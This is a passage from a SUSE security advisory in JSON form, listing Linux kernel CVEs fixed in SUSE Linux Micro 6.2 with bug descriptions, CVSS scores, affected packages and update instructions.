"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-68804"
},
{
"cve": "CVE-2025-68808",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68808"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: vidtv: initialize local pointers upon transfer of memory ownership\n\nvidtv_channel_si_init() creates a temporary list (program, service, event)\nand ownership of the memory itself is transferred to the PAT/SDT/EIT\ntables through vidtv_psi_pat_program_assign(),\nvidtv_psi_sdt_service_assign(), vidtv_psi_eit_event_assign().\n\nThe problem here is that the local pointer where the memory ownership\ntransfer was completed is not initialized to NULL. This causes the\nvidtv_psi_pmt_create_sec_for_each_pat_entry() function to fail, and\nin the flow that jumps to free_eit, the memory that was freed by\nvidtv_psi_*_table_destroy() can be accessed again by\nvidtv_psi_*_event_destroy() due to the uninitialized local pointer, so it\nis freed once again.\n\nTherefore, to prevent use-after-free and double-free vulnerability,\nlocal pointers must be initialized to NULL when transferring memory\nownership.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68808",
"url": "https://www.suse.com/security/cve/CVE-2025-68808"
},
{
"category": "external",
"summary": "SUSE Bug 1256682 for CVE-2025-68808",
"url": "https://bugzilla.suse.com/1256682"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68808"
},
{
"cve": "CVE-2025-68811",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68811"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsvcrdma: use rc_pageoff for memcpy byte offset\n\nsvc_rdma_copy_inline_range added rc_curpage (page index) to the page\nbase instead of the byte offset rc_pageoff. Use rc_pageoff so copies\nland within the current page.\n\nFound by ZeroPath (https://zeropath.com)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68811",
"url": "https://www.suse.com/security/cve/CVE-2025-68811"
},
{
"category": "external",
"summary": "SUSE Bug 1256677 for CVE-2025-68811",
"url": "https://bugzilla.suse.com/1256677"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68811"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
